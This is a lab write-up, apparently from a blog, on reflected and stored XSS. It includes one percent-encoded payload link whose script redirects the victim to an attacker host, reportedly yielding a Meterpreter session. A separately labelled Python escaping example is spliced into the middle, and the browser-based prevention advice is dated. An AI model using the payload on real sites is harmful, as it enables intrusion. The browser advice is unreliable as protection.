Web Application Attack: Cross site scripting (aka XSS)

Reflected XSS

Reflected XSS is a technique that uses the web server's domain and attaches the attacker's own script to a link on that domain; the attacker then sends this link to an unsuspecting user, and once the user clicks the link the script is executed by the user's browser.

Test for XSS

If the test for XSS is positive, a popup will appear. WordPress has protection against XSS, so I cannot write out the script tags here.
This means the site is vulnerable to XSS.

Preparing a link that attaches attacker’s script

The attacker sets up a fake site that the victim believes is a trusted site. The attacker then crafts a convincing-looking email and sends it to the victim.

The victim clicked and accessed the link: http://192.168.20.17/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%2e%31%33%22%3c%2f%73%63%72%69%70%74%3e
The victim unwittingly clicked "Run".
A Meterpreter session was created on the attacker's machine.

About reflected xss attack

Modern browsers stop XSS effectively; the lab demonstration was successful with Windows XP and IE 6.0. IE 8.0 and higher versions of IE, Chrome and Firefox can stop the script from being executed by the browser. NoScript is a good add-on for your Firefox browser.

Stored XSS

Stored XSS is a technique where the script is stored on the web server; whenever a user's browser visits the web server, the script is executed by the victim's browser.

The attacker planted the script on the web server.
The script was planted. From now on, whoever visits the site has the script sent to their browser, and if the browser has no protection against script execution, the victim's browser will simply execute the script.
A victim visited the blog and the victim's browser executed the script.
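Both the reflected case above and the stored case differ only in where the string comes from (the query string or a saved post); the server-side fix is the same, HTML-encoding the value at output time. The following is an added example, not code from the post or from DVWA: it decodes the crafted link shown earlier the way a server would, then renders it through an assumed vulnerable page template and through a hardened one (the `<pre>Hello ...</pre>` markup is an assumption, since the post does not show the server-side code).

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed for this example: the percent-encoded link from the post. The
# server decodes the "name" parameter before reflecting it into the page.
CRAFTED_LINK = (
    "http://192.168.20.17/vulnerabilities/xss_r/?name="
    "%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d"
    "%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%2e%31%33%22"
    "%3c%2f%73%63%72%69%70%74%3e"
)


def name_from_link(link):
    """Decode the query string as a web server would; returns the 'name' value."""
    return parse_qs(urlsplit(link).query).get("name", [""])[0]


def render_vulnerable(value):
    """Assumed page template that puts the value into the HTML verbatim."""
    return "<pre>Hello " + value + "</pre>"


def render_hardened(value):
    """Same template, but the value is HTML-encoded before it reaches the markup.
    quote=True also encodes quotes, so the value cannot break out of attributes."""
    return "<pre>Hello " + html.escape(value, quote=True) + "</pre>"


def render_guestbook(comments, render):
    """Stored XSS: the same rendering rule applied to saved comments rather than
    to the query string. Each comment goes through the chosen template."""
    return "\n".join(render(c) for c in comments)


def contains_script_tag(page):
    """Cheap check used here to show whether markup reached the browser intact."""
    return "<script" in page.lower()


if __name__ == "__main__":
    name = name_from_link(CRAFTED_LINK)
    print("decoded parameter :", name)
    print("vulnerable page   :", render_vulnerable(name))
    print("hardened page     :", render_hardened(name))
```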

Conclusion

To prevent XSS as a web user, you should use the Google Chrome or Chromium browser; the Google Chrome browser is excellent in suppressing script execution. If you are using Firefox, new Firefox versions also stop suspected script execution; however, I would recommend using the NoScript add-on.
